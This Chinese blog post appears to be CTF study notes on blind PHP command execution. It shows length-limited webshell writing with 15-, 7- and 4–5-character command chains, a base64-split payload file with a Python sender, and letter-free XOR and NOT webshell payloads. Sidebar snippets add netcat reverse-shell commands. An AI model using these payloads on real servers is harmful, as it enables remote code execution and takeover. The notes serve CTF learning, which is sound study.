CTF之萌新web学习(命令执行2)

最新推荐文章于 2024-08-21 13:58:28 发布
最新推荐文章于 2024-08-21 13:58:28 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: ctf 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmth666/article/details/104691516
版权

命令执行2

命令执行无回显情况

判断方法使用
延时sleep
HTTP请求curl ip地址:端口
DNS请求curl url地址

利用:
写shell或反弹shell(直接写入/外部下载)
http/dns等方式带出数据

可控字符串长度限制getshell

15个字符

  1. wget 地址/a 使用wget下载文件
    mv a a.php 将a改名为a.php
    需要超短域名才可以实现
  2. echo \<?php >1 长度为14
    在这里插入图片描述
    在这里插入图片描述
    成功写入,接下来是增加语句,因为是一样的,我就在linux上演示了
    在这里插入图片描述
    在这里插入图片描述
    echo eval\(>>1 长度为14
    echo \$_GET>>1 长度为14
    echo \[a\]>>1 长度为13
    echo \)\;>>1 长度为12
    最后改名为a.php即可 注意:\为转义字符
    在这里插入图片描述

7个字符

在这里插入图片描述
ls>a会将所有文件名输入到a里面,并且将ls按数字1~9,字母a~b排序, 但我们可以让它基于时间排序ls -t(从晚到早)
在这里插入图片描述
并且如果命令太长可用\分割执行,接着sh a是将a里面的内容当做命令执行
在这里插入图片描述
由于我们的语句<?php eval($_GET[1]);有特殊字符,可使用base64编码来使语句容易写入,再用|base64 -d解码即可。
base64为:

PD9waHAgZXZhbCgkX0dFVFsxXSk7

执行的语句为

echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php

payload.txt的代码如下

>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

python脚本如下

import requests

url1 = "http://192.168.153.131/7.php?1="
with open("payload.txt","r") as f:
	for i in f:
		url = url1+i.strip()
		requests.get(url)

res = requests.get("http://192.168.153.131/1.php")
if res.status_code:
	print 'success!!!'

发现最后两句话未执行,发现ls -t>0为7个字符。。。。。。改为<8看看
在这里插入图片描述
发现成功,可行
在这里插入图片描述
生成了1.php
在这里插入图片描述
之前还是有点问题,最小字符个数应为7而不是<7

这里参考借鉴了师傅的文章和代码7位可控字符下的任意命令执行

4或5个字符

原理和上面是一样的,唯一的不同是ls -t>0,我们要拼接这一串即可,开始试验:
由于下图的顺序较为复杂,无法跟之前一样,所以引入了新知识
在这里插入图片描述
统配符 *:Linux会把第一个列出的文件名当作命令,剩下的文件名当作参数
在这里插入图片描述
*还可以增加字母来限定被用来当作命令和参数的文件名
在这里插入图片描述
通过rev来倒置输出内容:
在这里插入图片描述
所以我们要得到f> t- sl这样的顺序,参考师傅写的代码

>dir
>f\>
>ht-
>sl
*>v    (等同于命令:dir "f>" "ht-" "sl" > v)
>rev
*v>0   (等同于命令:rev v > 0)(0 里面的内容为:ls -th >f)

参考师傅文章5位可控字符下的任意命令执行-----另一种解题方法

无字母数字getshell

异或运算

中心思想:将非字母、数字的字符经过各种变换最后能构造出a~z中任意一个字符
在这里插入图片描述
用ASCII表来异或运算

<?php
highlight_file(__file__);
$a = '~!@#$%^&*()_+\|/?.,<>`-={}[]';
for($i = 0;$i<strlen($a);$i++){
   for($j = 0;$j<strlen($a);$j++){
   	if (ord($a[$i]^$a[$j])>64 && ord($a[$i]^$a[$j])<91){
   		echo     $a[$i]. ' xor ' .$a[$j]. ' is ';
   		echo  chr(ord($a[$i]^$a[$j])). ' ';
   			echo  ord($a[$i]^$a[$j]);
   		echo "\n<br>";
   	}elseif (ord($a[$i]^$a[$j])>96 && ord($a[$i]^$a[$j])<122){
   		echo     $a[$i]. ' xor ' .$a[$j]. ' is ';
   		echo   chr(ord($a[$i]^$a[$j])). ' ';
   			echo    '  ' .ord($a[$i]^$a[$j]);
   		echo "\n<br>";
   	}
   }
}
?>

生成的异或运算结果如下
在这里插入图片描述
剩下的我就不一一列举了,需要哪些字母异或生成即可

取反

使用的是位运算里的“取反”,利用UTF-8编码的某个汉字,并将其中某个字符取出来。
在这里插入图片描述
UTF-8中一个汉字占三个字节,取反发现:
146的二进制为10010010,十六进制为92,取反为01101101,‬十进制为109,ASCII码为m
140的二进制为‭10001100‬,十六进制为8c,取反为01110011,十进制为115,ASCII码为s
在这里插入图片描述
那么就可以用汉字来得到想要的字母了

自增

在这里插入图片描述
在处理字符变量的算数运算时,PHP 沿袭了 Perl 的习惯,而非 C 的。例如,在 Perl 中 $a = ‘Z’; $a++; 将把 $a 变成’AA’,而在 C 中,a = ‘Z’; a++; 将把 a 变成 ‘[’(‘Z’ 的 ASCII 值是 90,’[’ 的 ASCII 值是91)。注意字符变量只能递增,不能递减,并且只支持纯字母(a-z 和 A-Z)。递增/递减其他字符变量则无效,原字符串没有变化。

只有当我们得到一个字母的时候,才可以自增。。。

参考php:递增/递减运算符

进行实验测试

在这里插入图片描述
我就用异或来写,其实还有很多方法的。我们应该传参为getFlag(),所以开始找异或

< xor [ is g 103 
> xor [ is e 101 
] xor ) is t 116 
= xor { is F 70 
@ xor , is l 108 
^ xor ? is a 97
< xor [ is g 103

'<>]=@^<'^'[[){,?['
在这里插入图片描述
然后我们要设置一个变量,在变量后跟上(),最终如下
?code=$_='<>]=@^<'^'[[){,?[';$_();
在这里插入图片描述
然后我测试了另一个异或出来的getFlag,却没有成功,不知道为什么这个是看人品的嘛。。。。。。
具体可以参考师傅的文章:
【PHP-CTF】无字母无数字webshell
无字母数字webshell之提高篇
记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门)

Bmth
关注
专栏目录
2024年网络安全最新ctfshow-萌新-web11( 利用命令执行漏洞获取网站敏感文件)_ctf
2301_79985178的博客
05-03 446
页面中展示了一部分源码, 并提示flag就在 config.php文件中源码过滤了参数中的 system, exec, highlight, cat 等关键字, 我们使用passthru()函数来执行系统命令, 查看文件内容的话可以使用 more命令来代替 cat, 先查看一下当前目录下有哪些文件当前目录下有两个文件根据前面的提示, 我们访问一下 config.php 文件页面没报错, 但啥都没显示右键查看网页源码, flag就在源码中还有兄弟不知道网络安全面试可以提前刷题吗?
CTFweb学习记录 -- 命令注入
lifanxin的博客
07-04 1416
命令注入概述常见攻击方式使用管道符号escapeshellarg和escapeshellcmd命令执行漏洞修复总结 概述   web服务器后端代码有时会调用一些执行系统命令的函数,以常见的php语言为例,使用system/exec/shell_exec/passthru/popen/proc_popen等函数可以执行系统命令。因此一旦我们可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 常见攻击方式 使用管道符号   我们以一段简单的php代码为
gentos 执行sh文件_CTFweb类型(十九)15位、7位可控字符下的任意命令执行
weixin_39625586的博客
11-04 298
点击上方蓝色字体,关注我们某些特殊情况下命令执行的Getshell中对应某个函数的内容可控,可控字符长度分为长可控和短可控。我们先来看15个字符可控。条件:get方式传值,能够传的最大字符串数是14个,传shell_exec思路:如果要getshell,相当于我们在里面写进去一个文件。这个文件是来自于我们服务器发给目标服务器,或者说是除我们之外的其它服务器在带给目标服务器的。如果是从其...
CTF萌新web学习(命令执行)
bmth666的博客
02-28 713
命令执行 命令注入漏洞的危害与web中间件运行权限有关。由于web应用运行在web中间件上,所有web应用会“继承”web中间件的运行权限。黑客可以利用漏洞任意的执行权限允许的命令,比如:查看系统敏感信息,添加管理员,反弹shell,下载并运行恶意代码等。一旦中间件权限分配过大,黑客将直接控制我们的web服务器。 命令注入的本质: 系统把用户输入的参数当成了要执行命令,并且这些命令执行了。 命...
CTF-命令执行【超详细】
最新发布
Innocence_0的博客
08-21 916
作者简介:不知名白帽,网络安全学习者。
16.CTF-web安全-命令执行
woo233的博客
09-29 1022
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。
CTF—攻防练习之HTTP—命令执行漏洞
weixin_38168760的博客
06-20 772
渗透环境: 主机:192.168.32.152 靶机:192.168.32.1 命令执行漏洞 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因:脚本语言优...
CTF_Web:8位以内可控字符getshell
AFCC_的博客(Web_Dog)
08-04 1611
题目来源 近期在练习CTF中的web题目时遇到一个8位字符以内可以随意执行命令,最终需要getshell 的题目,发现很多前辈都写了这类型的题解,但也需要自己实践一下,题目源码访问后如图: 思路:可以看出当提交的参数1包含的值少于8位时,都会当作命令执行,首先?1=ls发现所有文件名都超过了8位,显然单靠这8位执行命令是不足以cat某个文件,于是需要利用拼接文件名执行代码getshell。 解题利用知识点 >a "在linux中会直接创建这个文件,但没有内容" ls -t "将目录中的文件以时间顺
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTF工具之御剑后台扫描(web).rar
09-16
CTF工具之御剑后台扫描(Web)】 在网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,参赛者通过解决各种安全问题来获取分数。御剑后台扫描工具是专门为CTF比赛设计的一款Web渗透测试工具,主要用于...
CTF萌新web学习(文件包含)
bmth666的博客
01-13 717
文件包含漏洞 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 相关函数 include() include_once() require() require_once() include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函...
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3773
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 879
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
nc连接获取shell
lionwerson的博客
12-09 5768
1.渗透过程中免不了获取shell,可以通过nc工具连接,当然还有其他很多的工具,只不过nc默认安装在linux中,比较方便。 nc正向连接,防火墙不阻挡外来流量: 客户端: nc -e cmd 192.168.0.18 4444 #主动连接客户端的4444端口 服务端: nc -lvvp 4444 #监听4444端口 nc反向连接,防火墙阻挡外部流量: 服务端: nc -l -p 4444 -t -e cmd.exe #-t通过telnet模式执行,可以省略 客户端: ..
netcat(NC)学习笔记-nc命令基础解释以及基础使用--包含使用nc获取shell
zr1213159840的博客
03-22 5280
NC学习笔记 搭配这个视频链接使用更佳 https://space.bilibili.com/439906928/channel/seriesdetail?sid=231485 基础概念 nc是什么? nc全称netcat,是借助tcp/ip连接来传送数据的一个工具,有tcp/ip连接的瑞士军刀美称。 nc有哪些功能 nc的主要功能有获取banner信息,远程控制,传输文件,端口扫描等功能,甚至能当聊天工具 nc的基本用法 connect to somewhere:连接至某个主机–nc的客户端 nc [
CTF中字符长度限制下的命令执行 rce(7字符5字符4字符)汇总
热门推荐
Love&Share
10-21 2万+
七字符rce 源码 <?php highlight_file(__FILE__); if(strlen($_GET[1]<7)){ echo strlen($_GET[1]); echo '<hr/>'; echo shell_exec($_GET[1]); }else{ exit('too long'); } ?> #写入语句 <?php eval($_GET[1]); #base64编码后 PD9waHAgZXZhbCgkX0dFV
CTF入门web篇17命令执行相关函数及绕过技巧讲解
anquanniu的博客
10-12 2085
命令注入和代码注入区别 之前我们讲过的都是代码注入,注入的代码相当于网页中新的代码,比如去执行数据库读取的操作,我们想办法插入一段代码去执行,这就是代码执行命令注入 命令注入执行的是系统中的命令,使目标服务器的命令在目标服务器上去执行我们想要执行命令,系统命令执行还是要基于某些函数的调度去实现的。 1、system函数 例如system函数执行系统命令并输出相应的结果: String ...
CTFweb)中的常见php函数意义与用法
qq_52907838的博客
04-05 1478
is_numeric()函数用于检测变量是否为数字或数字字符串, 如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回空值,即 FALSE var_dump()会返回数据变量的类型和值 eval()会把字符串当作php代码 看到eval(),想到可以用命令执行漏洞 strpos() 函数用于在字符串内查找一个字符或一段指定的文本,如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置。如果未找到匹配,则返回 FALSE。 strlen函...
攻防世界pwn新手练习(get_shell
BurYiA的博客
09-15 6964
get_shell pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头) IDA Pro IDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。 pwntools pwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开...
命令执行命令执行漏洞无回显如何渗透
wj33333的博客
11-21 620
命令执行漏洞无回显如何渗透
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值